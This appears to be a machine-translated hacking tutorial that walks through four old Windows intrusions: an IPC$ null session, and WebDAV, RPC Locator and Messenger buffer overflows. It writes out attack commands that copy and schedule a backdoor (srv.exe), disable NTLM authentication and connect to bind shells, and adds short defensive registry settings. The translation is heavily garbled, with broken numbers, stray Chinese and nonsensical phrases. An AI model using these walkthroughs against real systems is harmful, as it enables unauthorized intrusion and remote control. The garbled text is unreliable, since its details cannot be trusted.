Large traffic network of the classic the invasion of technology-vulnerability warning-the black bar safety net

【Introduction】
According to legend, in the magical world of the Internet, there is a group of habits a nocturnal person, their freedom, against a fee, the same belief is shared in that group of people’s eyes, all living beings are equal, there is no strong unbreakable walls, they just–hacker! Today we put the hackers often used the classic invasion of the technology and share!

One, eternal IPC$

Invasion difficulty:★★★（medium）

Presence range:★★★（medium）

Danger index:★★★★★ very high

The use of odds:★★★★★ very high

Easy to use index: 7 5%

Editorial review comments:

As is well known, safety is an aging problem, take two years ago, a hundred test of sorts. printer overflow and unicode, in the current year basically did not how to good-bye there is also available!

However it seems there are exceptions, for the IPC$problem of the attacks on commonly used often new.

What is the IPC$vulnerabilities:

IPC$is a shared“named pipe”resources, mainly used for inter-program communication. In the remote management computer and view your computer’s shared resources. Use the default IPC$we can with the target host creates an empty connection with no user name and password, and the use of the available connection, we can obtain the target host users on the list.

We always say ipc$loopholes ipc$vulnerability, in fact, ipc$is not a real sense of vulnerability, it is in order to facilitate the Administrator’s remote management and open the remote network login function, but also opens the default share, that all logical drive(c$, d$, e$…) And the system directory winnt or windows(admin$) is.

All of these, the intention is to facilitate the Administrator’s management, but good intentions do not necessarily have good results, some with ulterior motives(in the end is what intention? I don’t know, pronouns a)will use IPC$, access to shared resources, export user list, and use some dictionary tools for password detection, in the hope to get higher privileges, so as to achieve ulterior motives.

Attack tools:

Scanning software: stream light 4. 7 1

Trojansoftware: srv.exe

Simple attack:

1. Open the stream to light 4. 7 1

2. To scan the front of the set

3. Assuming sweep 1 2 7. 0. 0. 1 There is the ipc$vulnerability, we perform the following operations

C:>net use $">\\127.0.0.1\IPC$ “” /user:“admintitrators” //this is a stream of light swept into the password

C:>copy srv.exe $">\\127.0.0.1\admin$ //first copy the srv. exe up, in the streaming light of the Tools directory there

Appear the following tips:

c:\winnt\system32\

Copied 1 files

C:>net time \\127.0.0.1 //check time, where time refers to the other computer, that is, we want to invade the 1 2 7. 0. 0. 1 time, there to remind everyone the point to note is, Please take the time to convert 2 4-hour clock

C:>at \\127.0.0.1 1 1:0 5 srv.exe //用 at 命令 启动 srv.exe

C:>net time \\127.0.0.1 //re-check enough time no

C:>telnet 127.0.0.1 9 9 //we telnet it, note the port is 9 9, The 因为 这里 我们 用 的 是 srv.exe the.

C:>copy ntlm.exe $">\\127.0.0.1\admin$ //we then open a DOS window, the ntlm. exe uploaded to a host, the stream of light tools directory there

C:\WINNT\system32>ntlm //run, the destruction of the other side of the machine ntlm authentication mode, so that we can by directly connected to each other in the telnet mode.

C:\WINNT\system32>

C:\WINNT\system32>net start telnet //and then directly with the net start telnet start telnet

The Telnet server is started.

The Telnet server has been started successfully. \ C //success

In this case we can directly use TELNET 127.0.0.1 connected to each other.

Bringing the invasion to an end.

How to defense:

1. Prohibit the establishment of air connection

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]

RestrictAnonymous = DWORD:0 0 0 0 0 0 0 1

2. Prohibit the management of shared

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]

AutoShareServer = DWORD:0 0 0 0 0 0 0 0

Second, the myth Webdav

Invasion difficulty:★★★（medium）

The presence of range:★★★★ high

Danger index:★★★★★ very high

The use of odds:★★★★ high

Easy to use index: 6 5%

Editorial review comments:

Due to space limitations in this paper, the group finalized the process, we highlight a simple and practical approach, then in year 3-5 month around the beginning of the Webdav attack avid using the webdav attack method undoubtedly should be on our list!

Webdav vulnerability description:

Microsoft Windows 2 0 0 0 to support the“World Wide Web Distributed Authoring and Versioning (WebDAV)”Protocol. RFC 2 5 1 8 defined in the WebDAV is the Hypertext Transfer Protocol (HTTP) is a set of extensions for Internet computing on the aIIS Service by default under the LocalSystem context is running in the security context of running. Although Microsoft has this weakness provided a patch and recommend that customers immediately install the hotfix, but still provides other tools and precautions, to customers in the assessment of the patch of the impact and compatibility when you can use these tools and measures in place to prevent this weakness from being exploited.

Attack tools:

Scanner: Webdavscan is a specialized for the detection of IIS 5.0 Server provides the WebDAV support for the scanner

Spill procedures: wdx.exe

Simple attack:

1. Use Webdavscan the target for scanning, detection!

2. The use of wdx. exe for testing, it should be noted that with patience, you can overflow the offset test several values.

3. The overflow is successful, use telnet or nc to connect to the target host 7 7 8 8 port.

Such as: telnet 127.0.0.1 7 7 8 8

Will appear the following prompt:

Microsoft Windows 2 0 0 0 [Version 5.00.2195] © copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>

So far the invasion is over!

How to defense:

1. Search the registry for the following keys:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters

Add the following registry key value:

Value name: DisableWebDAV

Data type: DWORD

Value data: 1

2. Using MS provide dedicated patch!
Third, The Destroyer RPC

Invasion difficulty:★★low

The presence of range:★★★★★ very high

Danger index:★★★★★ very high

The use of odds:★★★★ high

Easy to use index: 8 0%

Editorial review comments:

Features I most love to see the martial arts novel, often see the authors described a talented General: the power to vancomycin dead on! Look at the Desk about the RPC worm impact on the global economy and the vulnerability in the vulnerability field status, not by the contact together.

The RPC vulnerability description:

Windows RPC Locator service is a mapping of logical names to network-specific name of the name service. The client uses RPC（remote procedure call Remote Procedure Call Locator service, the Locator service is responsible for the customer’s network name resolution is converted to a hard disk, printer and other computer system on the actual resource address. If a printer server, the logical name"laserprinter", the RPC Client calls the Locator service to find the network name of the mapped to"laserprinter", the RPC Client calls the RPC service to use the network name to submit the request.

However, the Locator service in receiving registration information when not on the Locator service parameters for a detailed check, the ultra long super large parameters may cause the service program to trigger the buffer overflow, so that the Locator service to crash, the carefully constructed data submission may be in the Locator service process privileges on the system, execute arbitrary commands, and the attacker to obtain system privileges.

By default, Windows 2 0 0 0 on the domain controller Locator service is run by default, and generally the windows workstation and the server is the default is not to start this service, but if theseoperating systemonce you start the Locator service also exists this vulnerability.

Attack tools:

Scan tool: Locator Scanner is a specifically designed to scan the vulnerability of the command line to run the scanner, you can use it to scan for open RPC Locator service of the host, to note that Locator Scanner can only scan a class C network address.）

Spill procedures: Re.exe

Simple invasion:

1. Enter console mode cmd mode: use the command: rpc 192.168.0.1 192.168.0.254

So we found a open the Locator Service of the host, the host address is: 192.168.0.2 is.

Tip: Locator Scanner usage is:

C:>rpc IPAddress-Start IPAddress-End

IPAddress-Start: scanning start IP address

IPAddress-End: the end of the scan IP address

2. Using RPC, a dedicated overflow tool for the overflow, which overflow after the permission is system permission.

Use the command: re-h 192.168.0.2

This attack’s invasion is over!

How to defense:

If your computer is not the windows Network’s domain controller, it is strongly recommended that you do not use the locator service, if you have to open it to turn off this service, and how to close the Windows Locator service is running, in Windows 2 0 0 0 and Windows XP systems, open the“Control Panel-Administrative Tools-Services”to view the Remote procedure call（RPC Locator service is started, if already started you can stop it, and the RPC Locator service state is set to“disable”.

If you really need a locator service, please as soon as possible to play on the patch.

Fourth, the upstart Messager

Invasion difficulty:★★★（medium）

The presence of range:★★★★★ very high

Danger index:★★★★★ very high

The use of odds:★★★★★ very high

Easy to use index: 8 5%

Editorial review comments:

Recently storms out of the vulnerability to natural good, alas, poor my messager transmitter, after probably not and with the c section of the mm chat La…

Messager vulnerability description:

Windows NT/2 0 0 0/ XP/2 0 0 0 3 The operating system has a default open Messenger（message queue service.

It is used for NT Server between the transmitting and receiving system administrator or the“alerter”service messages, this vulnerability there is a buffer stack overflow vulnerability due to a buffer to save the message before the data is not properly check the length of the message, may be exploited by attackers to carry away the overflow, denial of service attack, causing the computer to stop responding and automatically restart, you can also execute arbitrary code, The specific overflow issue exists in the message queue service program of the search-by-name function, the attacker submitted an overly long string to this function may cause heap overflow.

Attack tools:

Scan tool: RetinaMSGSVC.exe from the famous foreign security company eeye of the ms03-0 4 3 Messenger vulnerability scanner

Overflow tool: msgr.exe

Simple attack:

1. 打开 RetinaMSGSVC.exe the start of the target to be scanned.

2. Use the msgr. exe on the target overflow, after the success will be in the target host 9 1 9 1 Port to bind a shell, allows us to proceed to the next control.

Command format such as: msgr.exe 192.168.0.2 0

3. Use the telnet command to connect to the host.

Command format such as: telnet 192.168.0.0.2 9 1 9 1

So far the invasion is over!

How to defense:

Messenger message is through NetBIOS or RPC submitted to the message service, it is possible by closing the NETBIOS ports(137-139)and use a firewall to filter UDP broadcast packets to block such messages. At the border firewall or Personal Firewall on the prohibition of the untrusted host to access the NETBIOS and RPC ports: 1 3 5, 1 3 7, 1 3 8, 1 3 9 (TCP/UDP), if you do not use the messenger service can have it disabled. Open the“Start”menu, click“Control Panel”in the“Computer Management tool”, double click“Services”, locate and double-click“Messenger”, then click“Stop”, and in“Startup Type”drop-down box, select“Disable”.

Microsoft has provided a security patch to fix this security vulnerability, if there is a specific differentoperating systemneed to download and install different patches, through Microsoft website the security Bulletin select and download the Install for your system’s security patches.